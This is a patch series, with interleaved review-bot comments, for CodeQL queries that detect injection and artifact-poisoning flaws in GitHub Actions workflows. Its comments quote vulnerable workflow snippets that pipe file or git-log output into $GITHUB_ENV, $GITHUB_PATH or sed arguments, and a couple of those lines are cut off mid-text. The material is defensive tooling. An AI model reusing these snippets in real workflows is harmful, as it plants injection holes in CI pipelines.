getACmdReachingGitHubOutputWrite(string cmd, string output_field) { + Bash::cmdReachingGitHubFileWrite(this, cmd, "GITHUB_OUTPUT", output_field) + } + + predicate getAnEnvReachingGitHubEnvWrite(string var, string output_field) { + Bash::envReachingGitHubFileWrite(this, var, "GITHUB_ENV", output_field) + } + + predicate getACmdReachingGitHubEnvWrite(string cmd, string output_field) { + Bash::cmdReachingGitHubFileWrite(this, cmd, "GITHUB_ENV", output_field) + } } /** 
diff --git a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll index 6e1a5c0f229..18ff398ebab 100644 --- a/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/ArgumentInjectionQuery.qll @@ -9,6 +9,23 @@ abstract class ArgumentInjectionSink extends DataFlow::Node { abstract string getCommand(); } +/** + * Holds if an environment variable is used, directly or indirectly, as an argument to a dangerous command + * in a Run step. + * Where the command is a string captured from the Run's script. + */ +bindingset[var] +predicate envToArgInjSink(string var, Run run, string command) { + exists(string argument, string cmd, string regexp, int command_group, int argument_group | + run.getACommand() = cmd and + argumentInjectionSinksDataModel(regexp, command_group, argument_group) and + command = cmd.regexpCapture(regexp, command_group) and + argument = cmd.regexpCapture(regexp, argument_group) and + Bash::envReachingRunExpr(run, var, argument) and + exists(run.getInScopeEnvVarExpr(var)) + ) +} + /** * Holds if a Run step declares an environment variable, uses it as the argument to a command vulnerable to argument injection. * e.g. @@ -21,10 +38,10 @@ class ArgumentInjectionFromEnvVarSink extends ArgumentInjectionSink { string command; ArgumentInjectionFromEnvVarSink() { - exists(Run run, string var_name | - envToArgInjSink(var_name, run, command) and + exists(Run run, string var | + envToArgInjSink(var, run, command) and run.getScriptScalar() = this.asExpr() and - exists(run.getInScopeEnvVarExpr(var_name)) + exists(run.getInScopeEnvVarExpr(var)) ) or exists( 
@@ -42,6 +59,33 @@ class ArgumentInjectionFromEnvVarSink extends ArgumentInjectionSink { override string getCommand() { result = command } } +/** + * Holds if a Run step executes a command that returns untrusted data which flows to an unsafe argument + * e.g. + * run: | + * BODY=$(git log --format=%s) + * sed "s/FOO/$BODY/g" > /tmp/foo + */ +class ArgumentInjectionFromCommandSink extends ArgumentInjectionSink { + string command; + + ArgumentInjectionFromCommandSink() { + exists( + CommandSource source, Run run, string cmd, string argument, string regexp, int argument_group, + int command_group + | + run = source.getEnclosingRun() and + this.asExpr() = run.getScriptScalar() and + cmd = run.getACommand() and + argumentInjectionSinksDataModel(regexp, command_group, argument_group) and + argument = cmd.regexpCapture(regexp, argument_group) and + command = cmd.regexpCapture(regexp, command_group) + ) + } + + override string getCommand() { result = command } +} + /** * Holds if a Run step declares an environment variable, uses it as the argument to a command vulnerable to argument injection. */ @@ -71,6 +115,14 @@ private module ArgumentInjectionConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { sink instanceof ArgumentInjectionSink } + + predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(Run run, string var | + run.getInScopeEnvVarExpr(var) = pred.asExpr() and + succ.asExpr() = run.getScriptScalar() and + envToArgInjSink(var, run, _) + ) + } } /** Tracks flow of unsafe user input that is used to construct and evaluate a code script. */ diff --git a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll index b7015590614..31a9edd03b3 100644 --- a/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll +++ b/ql/lib/codeql/actions/security/ArtifactPoisoningQuery.qll 
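Review bot: `ArgumentInjectionFromCommandSink` never relates the `CommandSource` to the captured `argument`: the characteristic predicate holds for any Run step that contains a command source and, anywhere in the same script, a command matching `argumentInjectionSinksDataModel`. `argument` is bound but otherwise unused, unlike `envToArgInjSink`, which requires `Bash::envReachingRunExpr(run, var, argument)`. Since source and sink are both the step's script scalar, a step that runs `git log` for one purpose and an unrelated `sed` with constant arguments would likely be reported. The sketch below ties the argument to the source command using predicates this commit adds in `Bash.qll`; whether `getCommand()` equals the text inside `$(...)` depends on how `Run.getACommand()` splits the script, which is outside this hunk.

```ql
      // … unchanged: exists(...) header, run/cmd binding, argument capture …
      command = cmd.regexpCapture(regexp, command_group) and
      (
        // $(git ...) used directly inside the dangerous argument
        Bash::containsCmdSubstitution(argument, source.getCommand())
        or
        // VAR=$(git ...) followed by a use of $VAR in the dangerous argument
        exists(string var, string value |
          run.getAnAssignment(var, value) and
          Bash::containsCmdSubstitution(value, source.getCommand()) and
          Bash::containsParameterExpansion(argument, var, _, _)
        )
      )
```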
@@ -274,6 +274,24 @@ private module ArtifactPoisoningConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof ArtifactSource } predicate isSink(DataFlow::Node sink) { sink instanceof ArtifactPoisoningSink } + + predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(PoisonableStep step | + pred instanceof ArtifactSource and + pred.asExpr().(Step).getAFollowingStep() = step and + ( + succ.asExpr() = step.(Run).getScriptScalar() or + succ.asExpr() = step.(UsesStep) + ) + ) + or + exists(Run run | + pred instanceof ArtifactSource and + pred.asExpr().(Step).getAFollowingStep() = run and + succ.asExpr() = run.getScriptScalar() and + Bash::outputsPartialFileContent(run, run.getACommand()) + ) + } } /** Tracks flow of unsafe artifacts that is used in an insecure way. */ diff --git a/ql/lib/codeql/actions/security/CodeInjectionQuery.qll b/ql/lib/codeql/actions/security/CodeInjectionQuery.qll index 8cd589fa9f8..ca72fe00d16 100644 --- a/ql/lib/codeql/actions/security/CodeInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/CodeInjectionQuery.qll @@ -19,6 +19,22 @@ private module CodeInjectionConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } predicate isSink(DataFlow::Node sink) { sink instanceof CodeInjectionSink } + + predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(Uses step | + pred instanceof FileSource and + pred.asExpr().(Step).getAFollowingStep() = step and + succ.asExpr() = step and + madSink(succ, "code-injection") + ) + or + exists(Run run | + pred instanceof FileSource and + pred.asExpr().(Step).getAFollowingStep() = run and + succ.asExpr() = run.getScriptScalar() and + Bash::outputsPartialFileContent(run, run.getACommand()) + ) + } } /** Tracks flow of unsafe user input that is used to construct and evaluate a code script. */ 
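Review bot: The second disjunct of `ArtifactPoisoningConfig.isAdditionalFlowStep` (a source step followed by a `Run` for which `Bash::outputsPartialFileContent(run, run.getACommand())` holds) is repeated almost token for token elsewhere. It appears in the `CodeInjectionConfig` hunk on this line and in the later hunks for `EnvPathInjectionConfig`, `EnvVarInjectionConfig` and `ActionsSHACheckoutConfig`, differing only in `ArtifactSource` versus `FileSource`. One shared predicate taking `pred` and `succ` would keep the five copies from drifting apart. As far as the hunk shows, the step also fires for any later Run that reads any file, with no check that the file lies under the downloaded or checked-out path. If that breadth is intended, a comment such as `// over-approximation: any file read in a later Run step is treated as reading the source's files` would make it explicit.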
diff --git a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll index a80032de320..1f53c938436 100644 --- a/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvPathInjectionQuery.qll @@ -14,6 +14,9 @@ abstract class EnvPathInjectionSink extends DataFlow::Node { } * e.g. * run: | * cat foo.txt >> $GITHUB_PATH + * echo "$(cat foo.txt)" >> $GITHUB_PATH + * FOO=$(cat foo.txt) + * echo "$FOO" >> $GITHUB_PATH */ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { EnvPathInjectionFromFileReadSink() { 
@@ -25,35 +28,34 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and ( - // e.g. - // cat test-results/.env >> $GITHUB_PATH - Bash::fileToGitHubPath(run, _) - or - exists(string value | - run.getAWriteToGitHubPath(value) and - ( - Bash::outputsPartialFileContent(run, value) - or - // e.g. - // FOO=$(cat test-results/sha-number) - // echo "FOO=$FOO" >> $GITHUB_PATH - exists(string var_name, string var_value | - run.getAnAssignment(var_name, var_value) and - Bash::outputsPartialFileContent(run, var_value) and - ( - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") - or - value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and - value.indexOf(var_name) > 0 - ) - ) - ) + exists(string cmd | + Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_PATH", _) and + Bash::outputsPartialFileContent(run, cmd) ) + or + Bash::fileToGitHubPath(run, _) ) ) } } +/** + * Holds if a Run step executes a command that returns untrusted data which flows to GITHUB_ENV + * e.g. + * run: | + * COMMIT_MESSAGE=$(git log --format=%s) + * echo "${COMMIT_MESSAGE}" >> $GITHUB_PATH + */ +class EnvPathInjectionFromCommandSink extends EnvPathInjectionSink { + EnvPathInjectionFromCommandSink() { + exists(CommandSource source | + this.asExpr() = source.getEnclosingRun().getScriptScalar() and + Bash::cmdReachingGitHubFileWrite(source.getEnclosingRun(), source.getCommand(), "GITHUB_PATH", + _) + ) + } +} + /** * Holds if a Run step declares an environment variable, uses it to declare a PATH env var. * e.g. 
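Review bot: The QLDoc added for `EnvPathInjectionFromCommandSink` says the data "flows to GITHUB_ENV", but the constructor passes `"GITHUB_PATH"` to `Bash::cmdReachingGitHubFileWrite` and the example writes to `$GITHUB_PATH`. The sentence looks copied from the env-var query and should read `* Holds if a Run step executes a command that returns untrusted data which flows to GITHUB_PATH`. Separately, `source.getEnclosingRun()` is spelled out twice in the constructor. Binding it once, `exists(CommandSource source, Run run | run = source.getEnclosingRun() and ...)`, would match how `ArgumentInjectionFromCommandSink` is written.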
@@ -65,7 +67,7 @@ class EnvPathInjectionFromFileReadSink extends EnvPathInjectionSink { class EnvPathInjectionFromEnvVarSink extends EnvPathInjectionSink { EnvPathInjectionFromEnvVarSink() { exists(Run run, string var_name | - envToSpecialFile("GITHUB_PATH", var_name, run, _) and + Bash::envReachingGitHubFileWrite(run, var_name, "GITHUB_PATH", _) and exists(run.getInScopeEnvVarExpr(var_name)) and run.getScriptScalar() = this.asExpr() ) @@ -84,6 +86,28 @@ private module EnvPathInjectionConfig implements DataFlow::ConfigSig { predicate isSource(DataFlow::Node source) { source instanceof RemoteFlowSource } predicate isSink(DataFlow::Node sink) { sink instanceof EnvPathInjectionSink } + + predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(Run run, string var | + run.getInScopeEnvVarExpr(var) = pred.asExpr() and + succ.asExpr() = run.getScriptScalar() and + Bash::envReachingGitHubFileWrite(run, var, ["GITHUB_ENV", "GITHUB_OUTPUT", "GITHUB_PATH"], _) + ) + or + exists(Uses step | + pred instanceof FileSource and + pred.asExpr().(Step).getAFollowingStep() = step and + succ.asExpr() = step and + madSink(succ, "envpath-injection") + ) + or + exists(Run run | + pred instanceof FileSource and + pred.asExpr().(Step).getAFollowingStep() = run and + succ.asExpr() = run.getScriptScalar() and + Bash::outputsPartialFileContent(run, run.getACommand()) + ) + } } /** Tracks flow of unsafe user input that is used to construct and evaluate the PATH environment variable. */ diff --git a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll index 65c6938f0a4..dd6b8342185 100644 --- a/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll +++ b/ql/lib/codeql/actions/security/EnvVarInjectionQuery.qll 
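Review bot: The first disjunct of `EnvPathInjectionConfig.isAdditionalFlowStep` accepts writes to `["GITHUB_ENV", "GITHUB_OUTPUT", "GITHUB_PATH"]`, while every sink class shown for this file is specific to `GITHUB_PATH`. Both the step target and the sinks are the Run's script scalar, so an environment variable that only reaches a `GITHUB_ENV` or `GITHUB_OUTPUT` write could be connected to a sink that exists for a different reason. An example is a file read into `GITHUB_PATH` in the same script, which would misattribute the finding. I would narrow the argument to `"GITHUB_PATH"` here, and to `"GITHUB_ENV"` in the identical step added to `EnvVarInjectionConfig` further down.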
@@ -14,8 +14,12 @@ abstract class EnvVarInjectionSink extends DataFlow::Node { } * e.g. * run: | * cat test-results/.env >> $GITHUB_ENV + * * echo "sha=$(cat test-results/sha-number)" >> $GITHUB_ENV * echo "sha=$(> $GITHUB_ENV + * + * FOO=$(cat test-results/sha-number) + * echo "FOO=$FOO" >> $GITHUB_ENV */ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { EnvVarInjectionFromFileReadSink() { 
@@ -27,37 +31,34 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and ( - // e.g. - // cat test-results/.env >> $GITHUB_ENV - Bash::fileToGitHubEnv(run, _) - or - exists(string value | - run.getAWriteToGitHubEnv(_, value) and - ( - // e.g. - // echo "FOO=$(cat test-results/sha-number)" >> $GITHUB_ENV - Bash::outputsPartialFileContent(run, value) - or - // e.g. - // FOO=$(cat test-results/sha-number) - // echo "FOO=$FOO" >> $GITHUB_ENV - exists(string var_name, string var_value | - run.getAnAssignment(var_name, var_value) and - Bash::outputsPartialFileContent(run, var_value) and - ( - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") - or - value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and - value.indexOf(var_name) > 0 - ) - ) - ) + exists(string cmd | + Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_ENV", _) and + Bash::outputsPartialFileContent(run, cmd) ) + or + Bash::fileToGitHubEnv(run, _) ) ) } } +/** + * Holds if a Run step executes a command that returns untrusted data which flows to GITHUB_ENV + * e.g. + * run: | + * COMMIT_MESSAGE=$(git log --format=%s) + * echo "COMMIT_MESSAGE=${COMMIT_MESSAGE}" >> $GITHUB_ENV + */ +class EnvVarInjectionFromCommandSink extends EnvVarInjectionSink { + EnvVarInjectionFromCommandSink() { + exists(CommandSource source | + this.asExpr() = source.getEnclosingRun().getScriptScalar() and + Bash::cmdReachingGitHubFileWrite(source.getEnclosingRun(), source.getCommand(), "GITHUB_ENV", + _) + ) + } +} + /** * Holds if a Run step declares an environment variable, uses it to declare env var. * e.g. 
@@ -69,9 +70,9 @@ class EnvVarInjectionFromFileReadSink extends EnvVarInjectionSink { class EnvVarInjectionFromEnvVarSink extends EnvVarInjectionSink { EnvVarInjectionFromEnvVarSink() { exists(Run run, string var_name | - envToSpecialFile("GITHUB_ENV", var_name, run, _) and exists(run.getInScopeEnvVarExpr(var_name)) and - run.getScriptScalar() = this.asExpr() + run.getScriptScalar() = this.asExpr() and + Bash::envReachingGitHubFileWrite(run, var_name, "GITHUB_ENV", _) ) } } @@ -104,6 +105,28 @@ private module EnvVarInjectionConfig implements DataFlow::ConfigSig { } predicate isSink(DataFlow::Node sink) { sink instanceof EnvVarInjectionSink } + + predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(Run run, string var | + run.getInScopeEnvVarExpr(var) = pred.asExpr() and + succ.asExpr() = run.getScriptScalar() and + Bash::envReachingGitHubFileWrite(run, var, ["GITHUB_ENV", "GITHUB_OUTPUT", "GITHUB_PATH"], _) + ) + or + exists(Uses step | + pred instanceof FileSource and + pred.asExpr().(Step).getAFollowingStep() = step and + succ.asExpr() = step and + madSink(succ, "envvar-injection") + ) + or + exists(Run run | + pred instanceof FileSource and + pred.asExpr().(Step).getAFollowingStep() = run and + succ.asExpr() = run.getScriptScalar() and + Bash::outputsPartialFileContent(run, run.getACommand()) + ) + } } /** Tracks flow of unsafe user input that is used to construct and evaluate an environment variable. */ diff --git a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll index 8541286f6e1..4f9eeef7579 100644 --- a/ql/lib/codeql/actions/security/OutputClobberingQuery.qll +++ b/ql/lib/codeql/actions/security/OutputClobberingQuery.qll 
@@ -10,7 +10,7 @@ import codeql.actions.dataflow.FlowSources abstract class OutputClobberingSink extends DataFlow::Node { } /** - * Holds if a Run step declares an environment variable with contents from a local file. + * Holds if a Run step declares a step output variable with contents from a local file. * e.g. * run: | * cat test-results/.vars >> $GITHUB_OUTPUT 
@@ -21,58 +21,43 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { OutputClobberingFromFileReadSink() { exists(Run run, Step step | ( - step instanceof UntrustedArtifactDownloadStep or + step instanceof UntrustedArtifactDownloadStep + or // This shoould be: // artifact instanceof PRHeadCheckoutStep // but PRHeadCheckoutStep uses Taint Tracking anc causes a non-Monolitic Recursion error // so we list all the subclasses of PRHeadCheckoutStep here and use actions/checkout as a workaround // instead of using ActionsMutableRefCheckout and ActionsSHACheckout - step.(Uses).getCallee() = "actions/checkout" or - step instanceof GitMutableRefCheckout or - step instanceof GitSHACheckout or - step instanceof GhMutableRefCheckout or + exists(Uses uses | + step = uses and + uses.getCallee() = "actions/checkout" and + exists(uses.getArgument("ref")) + ) + or + step instanceof GitMutableRefCheckout + or + step instanceof GitSHACheckout + or + step instanceof GhMutableRefCheckout + or step instanceof GhSHACheckout ) and - this.asExpr() = run.getScriptScalar() and step.getAFollowingStep() = run and + this.asExpr() = run.getScriptScalar() and ( - // e.g. - // cat test-results/.vars >> $GITHUB_OUTPUT - Bash::fileToGitHubOutput(run, _) - or - exists(string key, string value | - run.getAWriteToGitHubOutput(key, value) and - // there is a different output variable in the same script - // TODO: key2/value2 should be declared before key/value - exists(string key2 | - run.getAWriteToGitHubOutput(key2, _) and - not key2 = key - ) and - ( - Bash::outputsPartialFileContent(run, value) - or - // e.g. 
- // FOO=$(cat test-results/sha-number) - // echo "FOO=$FOO" >> $GITHUB_OUTPUT - exists(string var_name, string var_value | - run.getAnAssignment(var_name, var_value) and - Bash::outputsPartialFileContent(run, var_value) and - ( - value.matches("%$" + ["", "{", "ENV{"] + var_name + "%") - or - value.regexpMatch("\\$\\((echo|printf|write-output)\\s+.*") and - value.indexOf(var_name) > 0 - ) - ) - ) + exists(string cmd | + Bash::cmdReachingGitHubFileWrite(run, cmd, "GITHUB_OUTPUT", _) and + Bash::outputsPartialFileContent(run, cmd) ) + or + Bash::fileToGitHubOutput(run, _) ) ) } } /** - * Holds if a Run step declares an environment variable, uses it to declare env var. + * Holds if a Run step declares an environment variable, uses it in a step variable output. * e.g. * env: * BODY: ${{ github.event.comment.body }} @@ -81,15 +66,15 @@ class OutputClobberingFromFileReadSink extends OutputClobberingSink { */ class OutputClobberingFromEnvVarSink extends OutputClobberingSink { OutputClobberingFromEnvVarSink() { - exists(Run run, string var_name, string key | - envToSpecialFile("GITHUB_OUTPUT", var_name, run, key) and + exists(Run run, string var, string field | + Bash::envReachingGitHubFileWrite(run, var, "GITHUB_OUTPUT", field) and // there is a different output variable in the same script // TODO: key2/value2 should be declared before key/value - exists(string key2 | - run.getAWriteToGitHubOutput(key2, _) and - not key2 = key + exists(string field2 | + run.getAWriteToGitHubOutput(field2, _) and + not field2 = field ) and - exists(run.getInScopeEnvVarExpr(var_name)) and + exists(run.getInScopeEnvVarExpr(var)) and run.getScriptScalar() = this.asExpr() ) } 
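Review bot: The `actions/checkout` branch of `OutputClobberingFromFileReadSink` now only requires `exists(uses.getArgument("ref"))`, so a checkout pinned to a fixed, trusted ref is treated the same as one that checks out pull-request code. The surrounding comment already explains why `PRHeadCheckoutStep` cannot be used, so the remaining imprecision is worth stating there, e.g. `// any explicit ref counts, including constant trusted refs; may over-report`. The rewrite also drops the old requirement that the script writes a second, different output key, while `OutputClobberingFromEnvVarSink` in the next hunk keeps it. If that difference is deliberate, a one-line comment saying why would help.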
@@ -113,10 +98,9 @@ class OutputClobberingFromEnvVarSink extends OutputClobberingSink { */ class WorkflowCommandClobberingFromEnvVarSink extends OutputClobberingSink { WorkflowCommandClobberingFromEnvVarSink() { - exists(Run run, string output_line, string clobbering_line, string var_name | - run.getScript().splitAt("\n") = output_line and - Bash::singleLineWorkflowCmd(output_line, "set-output", _, _) and - run.getScript().splitAt("\n") = clobbering_line and + exists(Run run, string clobbering_line, string var_name | + Bash::singleLineWorkflowCmd(run.getACommand(), "set-output", _, _) and + run.getACommand() = clobbering_line and clobbering_line.regexpMatch(".*echo\\s+(-e\\s+)?(\"|')?\\$(\\{)?" + var_name + ".*") and exists(run.getInScopeEnvVarExpr(var_name)) and run.getScriptScalar() = this.asExpr() @@ -124,13 +108,36 @@ class WorkflowCommandClobberingFromEnvVarSink extends OutputClobberingSink { } } +/** + * - id: clob1 + * run: | + * # VULNERABLE + * PR="$(; @@ -93,6 +102,15 @@ private module ActionsSHACheckoutConfig implements DataFlow::ConfigSig { uses.getArgumentExpr("ref") = sink.asExpr() ) } + + predicate isAdditionalFlowStep(DataFlow::Node pred, DataFlow::Node succ) { + exists(Run run | + pred instanceof FileSource and + pred.asExpr().(Step).getAFollowingStep() = run and + succ.asExpr() = run.getScriptScalar() and + Bash::outputsPartialFileContent(run, run.getACommand()) + ) + } } module ActionsSHACheckoutFlow = TaintTracking::Global; @@ -139,7 +157,7 @@ predicate containsHeadSHA(string s) { "\\bgithub\\.event\\.merge_group\\.head_sha\\b", "\\bgithub\\.event\\.merge_group\\.head_commit\\.id\\b", // heuristics - "\\bhead\\.sha\\b", "\\bhead_sha\\b", "\\bpr_head_sha\\b" + "\\bhead\\.sha\\b", "\\bhead_sha\\b", "\\bmerge_sha\\b", "\\bpr_head_sha\\b" ], _, _) ) } 
@@ -156,7 +174,7 @@ predicate containsHeadRef(string s) { "\\bgithub\\.event\\.check_run\\.pull_requests\\[\\d+\\]\\.head\\.ref\\b", "\\bgithub\\.event\\.merge_group\\.head_ref\\b", // heuristics - "\\bhead\\.ref\\b", "\\bhead_ref\\b", "\\bpr_head_ref\\b", + "\\bhead\\.ref\\b", "\\bhead_ref\\b", "\\bmerge_ref\\b", "\\bpr_head_ref\\b", // env vars "GITHUB_HEAD_REF", ], _, _) From 1e749ae6d5ddff29c0bd1bac751c75ab5bbdb2df Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 11 Oct 2024 12:20:39 +0200 Subject: [PATCH 0577/1267] Add new poisonable step --- ql/lib/ext/config/poisonable_steps.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/ql/lib/ext/config/poisonable_steps.yml b/ql/lib/ext/config/poisonable_steps.yml index 1543e2d8d45..aa5148d7cf6 100644 --- a/ql/lib/ext/config/poisonable_steps.yml +++ b/ql/lib/ext/config/poisonable_steps.yml @@ -52,6 +52,7 @@ extensions: - ["rails\\s+assets:precompile"] - ["rubocop"] - ["sed\\s+-f"] + - ["sonar-scanner"] - ["stylelint"] - ["terraform"] - ["tflint"] From 99e92af0342654cd86e600f03207b8aa005e7d24 Mon Sep 17 00:00:00 2001 
From: =?UTF-8?q?Alvaro=20Mu=C3=B1oz?= Date: Fri, 11 Oct 2024 12:20:57 +0200 Subject: [PATCH 0578/1267] Update tests --- .../library-tests/poisonable_steps.expected | 2 + ql/test/library-tests/test.ql | 2 +- .../.github/workflows/calling_composite.yml | 0 .../.github/workflows/calling_workflow.yml | 0 .../.github/workflows/reusable_workflow.yml | 0 .../CompositeActionsSinks.expected | 0 .../CompositeActionsSinks.qlref | 0 .../CompositeActionsSources.expected | 0 .../CompositeActionsSources.qlref | 0 .../CompositeActionsSummaries.expected | 0 .../CompositeActionsSummaries.qlref | 0 .../ReusableWorkflowsSinks.expected | 0 .../ReusableWorkflowsSinks.qlref | 0 .../ReusableWorkflowsSources.expected | 0 .../ReusableWorkflowsSources.qlref | 0 .../ReusableWorkflowsSummaries.expected | 0 .../ReusableWorkflowsSummaries.qlref | 0 .../CWE-020 => Models}/action1/action.yml | 0 .../CWE-074/OutputClobberingHigh.expected | 16 +- .../CWE-077/.github/workflows/test13.yml | 23 +++ .../CWE-077/.github/workflows/test14.yml | 30 ++++ .../CWE-077/.github/workflows/test15.yml | 29 ++++ .../CWE-077/.github/workflows/test8.yml | 2 - .../CWE-077/EnvPathInjectionCritical.expected | 11 +- .../CWE-077/EnvPathInjectionMedium.expected | 11 +- .../CWE-077/EnvVarInjectionCritical.expected | 77 +++++---- .../CWE-077/EnvVarInjectionMedium.expected | 65 ++++---- .../.github/workflows/arg_injection.yml | 12 +- .../ArgumentInjectionCritical.expected | 49 +++--- .../CWE-088/ArgumentInjectionMedium.expected | 31 ++-- .../CWE-094/.github/workflows/test.yml | 15 +- .../CWE-094/.github/workflows/test1.yml | 4 +- .../CWE-094/.github/workflows/test14.yml | 51 ++++++ .../CWE-094/.github/workflows/test15.yml | 38 +++++ .../CWE-094/CodeInjectionCritical.expected | 146 +++++++++++------- .../CWE-094/CodeInjectionMedium.expected | 134 ++++++++++------ .../ArtifactPoisoningCritical.expected | 38 ++--- .../CWE-829/ArtifactPoisoningMedium.expected | 38 ++--- 38 files changed, 544 insertions(+), 280 deletions(-) rename 
ql/test/query-tests/{Security/CWE-020 => Models}/.github/workflows/calling_composite.yml (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/.github/workflows/calling_workflow.yml (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/.github/workflows/reusable_workflow.yml (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/CompositeActionsSinks.expected (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/CompositeActionsSinks.qlref (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/CompositeActionsSources.expected (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/CompositeActionsSources.qlref (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/CompositeActionsSummaries.expected (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/CompositeActionsSummaries.qlref (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/ReusableWorkflowsSinks.expected (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/ReusableWorkflowsSinks.qlref (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/ReusableWorkflowsSources.expected (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/ReusableWorkflowsSources.qlref (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/ReusableWorkflowsSummaries.expected (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/ReusableWorkflowsSummaries.qlref (100%) rename ql/test/query-tests/{Security/CWE-020 => Models}/action1/action.yml (100%) create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test13.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test14.yml create mode 100644 ql/test/query-tests/Security/CWE-077/.github/workflows/test15.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test14.yml create mode 100644 ql/test/query-tests/Security/CWE-094/.github/workflows/test15.yml 
diff --git a/ql/test/library-tests/poisonable_steps.expected b/ql/test/library-tests/poisonable_steps.expected index a87ec0a341c..100eddb1400 100644 --- a/ql/test/library-tests/poisonable_steps.expected +++ b/ql/test/library-tests/poisonable_steps.expected @@ -1,3 +1,5 @@ +| .github/workflows/multiline2.yml:63:9:66:6 | Run Step | +| .github/workflows/multiline.yml:63:9:66:6 | Run Step | | .github/workflows/poisonable_steps.yml:8:9:13:6 | Uses Step | | .github/workflows/poisonable_steps.yml:13:9:14:6 | Run Step | | .github/workflows/poisonable_steps.yml:14:9:15:6 | Run Step | diff --git a/ql/test/library-tests/test.ql b/ql/test/library-tests/test.ql index 5880e06da7f..03f9e5b1840 100644 --- a/ql/test/library-tests/test.ql +++ b/ql/test/library-tests/test.ql @@ -150,6 +150,6 @@ query predicate isBashParameterExpansion(string parameter, string operator, stri "${parameter21%%pattern}", "${parameter22/pattern/string}", "${parameter23//pattern/string}", ] and - Bash::isBashParameterExpansion(test, parameter, operator, params) + Bash::isParameterExpansion(test, parameter, operator, params) ) } diff --git a/ql/test/query-tests/Security/CWE-020/.github/workflows/calling_composite.yml b/ql/test/query-tests/Models/.github/workflows/calling_composite.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-020/.github/workflows/calling_composite.yml rename to ql/test/query-tests/Models/.github/workflows/calling_composite.yml diff --git a/ql/test/query-tests/Security/CWE-020/.github/workflows/calling_workflow.yml b/ql/test/query-tests/Models/.github/workflows/calling_workflow.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-020/.github/workflows/calling_workflow.yml rename to ql/test/query-tests/Models/.github/workflows/calling_workflow.yml 
diff --git a/ql/test/query-tests/Security/CWE-020/.github/workflows/reusable_workflow.yml b/ql/test/query-tests/Models/.github/workflows/reusable_workflow.yml similarity index 100% rename from ql/test/query-tests/Security/CWE-020/.github/workflows/reusable_workflow.yml rename to ql/test/query-tests/Models/.github/workflows/reusable_workflow.yml diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected b/ql/test/query-tests/Models/CompositeActionsSinks.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.expected rename to ql/test/query-tests/Models/CompositeActionsSinks.expected diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.qlref b/ql/test/query-tests/Models/CompositeActionsSinks.qlref similarity index 100% rename from ql/test/query-tests/Security/CWE-020/CompositeActionsSinks.qlref rename to ql/test/query-tests/Models/CompositeActionsSinks.qlref diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected b/ql/test/query-tests/Models/CompositeActionsSources.expected similarity index 100% rename from ql/test/query-tests/Security/CWE-020/CompositeActionsSources.expected rename to ql/test/query-tests/Models/CompositeActionsSources.expected diff --git a/ql/test/query-tests/Security/CWE-020/CompositeActionsSources.qlref b/ql/test/query-tests/Models/CompositeActionsSources.qlref similarity index 100% rename from 